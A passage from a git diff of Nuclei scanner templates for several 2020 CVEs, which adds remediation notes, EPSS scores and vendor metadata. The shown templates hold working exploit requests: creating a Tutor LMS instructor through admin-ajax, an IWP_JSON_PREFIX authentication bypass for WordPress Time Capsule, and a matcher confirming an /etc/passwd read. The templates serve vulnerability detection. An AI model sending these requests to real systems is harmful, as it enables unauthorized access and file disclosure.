+ pass: "{{rand_base(8)}}" + email: "{{randstr}}@{{rand_base(5)}}.com" + firstname: "{{rand_base(5)}}" + lastname: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'contains(content_type_2, "application/json")' + - 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")' + - 'status_code_2 == 200' + condition: and + +# digest: 4a0a00473045022100b502e99195a2eb693dde9a3539343c62fa771c74151e684e62c8b821998cdb2302200a53deb8762445b4234240374ba19d4e5770808a6ec1b655ecfd7b16e7867d2c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-8641.yaml b/http/cves/2020/CVE-2020-8641.yaml index a52ae8e907..36eab2be03 100644 --- a/http/cves/2020/CVE-2020-8641.yaml +++ b/http/cves/2020/CVE-2020-8641.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Lotus Core CMS 1.0.1 allows authenticated local file inclusion of .php files via directory traversal in the index.php page_slug parameter. + remediation: | + Apply the latest security patch or update to Lotus Core CMS 1.0.1 to fix the LFI vulnerability. reference: - https://cxsecurity.com/issue/WLB-2020010234 - https://www.exploit-db.com/exploits/47985 @@ -14,11 +16,14 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8641 cwe-id: CWE-22 - cpe: cpe:2.3:a:lotus_core_cms_project:lotus_core_cms:*:*:*:*:*:*:*:* - epss-score: 0.00796 - tags: cve2020,lfi,lotus,cms,edb,cve + epss-score: 0.00659 + epss-percentile: 0.77253 + cpe: cpe:2.3:a:lotus_core_cms_project:lotus_core_cms:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: lotus_core_cms_project + product: lotus_core_cms + tags: cve2020,lfi,lotus,cms,edb,cve http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/28 +# digest: 4a0a00473045022100f1ff55fdf0bd18a8ddd84e4a979ecbd9bb48288ecd4f3ed76757576ea05c6221022002b57bbf1bf8bd824aba2142f7e809d5947c70e8c29c48431e0b2b86599b99a9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml index 0d0921c939..edc929cd35 100644 --- a/http/cves/2020/CVE-2020-8644.yaml +++ b/http/cves/2020/CVE-2020-8644.yaml @@ -5,20 +5,26 @@ info: author: dbrwsky severity: critical description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template. + remediation: | + Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability. reference: - https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/ - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/ - https://nvd.nist.gov/vuln/detail/CVE-2020-8644 - http://packetstormsecurity.com/files/157106/PlaySMS-index.php-Unauthenticated-Template-Injection-Code-Execution.html + - https://forum.playsms.org/t/playsms-1-4-3-has-been-released/2704 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-8644 - cwe-id: CWE-74 + cwe-id: CWE-94 + epss-score: 0.96035 + epss-percentile: 0.99301 cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:* - epss-score: 0.94485 metadata: max-request: 2 + vendor: playsms + product: playsms tags: unauth,kev,packetstorm,cve,cve2020,ssti,playsms,rce http: @@ -27,7 +33,6 @@ http: GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - - | POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1 Host: {{Hostname}} @@ -39,18 +44,9 @@ http: cookie-reuse: true host-redirects: true max-redirects: 2 - extractors: - - type: xpath - name: csrf - part: body - attribute: value - internal: true - xpath: - - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input matchers-condition: and matchers: - - type: word part: body words: @@ -60,4 +56,13 @@ http: status: - 200 -# Enhanced by mp on 2022/07/07 \ No newline at end of file + extractors: + - type: xpath + name: csrf + internal: true + xpath: + - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input + attribute: value + part: body + +# digest: 4a0a00473045022100d2a63b2e273645671ec39246a8a7a74c48f50ed2e53fd99657f1c8ba2596d0aa02207e3b760b676992d65e0d60263e62ae7b1594c637eb3b99a573afc627ead2dc08:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml index 6d6f524568..44795e0348 100644 --- a/http/cves/2020/CVE-2020-8654.yaml +++ b/http/cves/2020/CVE-2020-8654.yaml @@ -5,6 +5,8 @@ info: author: praetorian-thendrickson severity: high description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465. + remediation: | + Upgrade to a patched version of EyesOfNetwork or apply the necessary security patches to mitigate the vulnerabilities. reference: - https://github.com/h4knet/eonrce - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb @@ -15,26 +17,20 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8654 cwe-id: CWE-78 - cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:*:*:*:*:*:*:*:* - epss-score: 0.05217 - tags: cisa,eyesofnetwork,rce,authenticated,msf,cve,cve2020 + epss-score: 0.05628 + epss-percentile: 0.92433 + cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: eyesofnetwork + product: eyesofnetwork + tags: cisa,eyesofnetwork,rce,authenticated,msf,cve,cve2020 http: - method: GET path: - "{{BaseURL}}/css/eonweb.css" - extractors: - - type: regex - name: version - internal: true - part: body - group: 1 - regex: - - '# VERSION : ([0-9.]+)' - matchers-condition: and matchers: - type: dsl @@ -50,4 +46,13 @@ http: status: - 200 -# Enhanced by mp on 2022/09/28 + extractors: + - type: regex + name: version + group: 1 + regex: + - "# VERSION : ([0-9.]+)" + internal: true + part: body + +# digest: 4b0a00483046022100b08e2f2cd49a77ed2f71f297ca673a95c11f4ccc4a0b08bddbf4792feb8e4936022100ca901fecafacfe9b4641254ced78c7da07267ae398f44b79807c8c8d54c7a161:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-8771.yaml b/http/cves/2020/CVE-2020-8771.yaml index 4373658c2a..01af9a9db0 100644 --- a/http/cves/2020/CVE-2020-8771.yaml +++ b/http/cves/2020/CVE-2020-8771.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: WordPress Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts. + remediation: | + Update WordPress Time Capsule plugin to version 1.21.16 or later. reference: - https://github.com/SECFORCE/WPTimeCapsulePOC - https://nvd.nist.gov/vuln/detail/CVE-2020-8771 @@ -15,11 +17,15 @@ info: cvss-score: 9.8 cve-id: CVE-2020-8771 cwe-id: CWE-287 - cpe: cpe:2.3:a:wptimecapsule:wp_time_capsule:*:*:*:*:*:*:*:* - epss-score: 0.0673 - tags: cve,cve2020,wordpress,wp-plugin + epss-score: 0.06142 + epss-percentile: 0.92727 + cpe: cpe:2.3:a:wptimecapsule:wp_time_capsule:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 + vendor: wptimecapsule + product: wp_time_capsule + framework: wordpress + tags: cve,cve2020,wordpress,wp-plugin http: - raw: @@ -30,7 +36,6 @@ http: Accept: */* IWP_JSON_PREFIX - - | GET /wp-admin/index.php HTTP/1.1 Host: {{Hostname}} @@ -38,19 +43,20 @@ http: Accept: */* cookie-reuse: true + matchers-condition: and matchers: - type: word + part: body words: - '